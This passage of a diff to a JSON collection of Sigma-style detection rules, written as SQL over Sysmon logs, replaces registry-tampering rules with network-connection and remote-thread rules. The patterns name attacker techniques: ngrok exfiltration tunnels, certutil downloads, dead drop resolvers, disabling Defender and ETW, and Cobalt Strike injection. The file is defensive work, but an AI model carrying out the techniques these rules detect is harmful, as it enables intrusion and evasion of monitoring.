'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru'))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE 
'%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject 
LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE 
'%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD 
(0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "falsepositives": [ + "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unknown" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR 
DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": 
"registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse 
the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE 
'%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE 
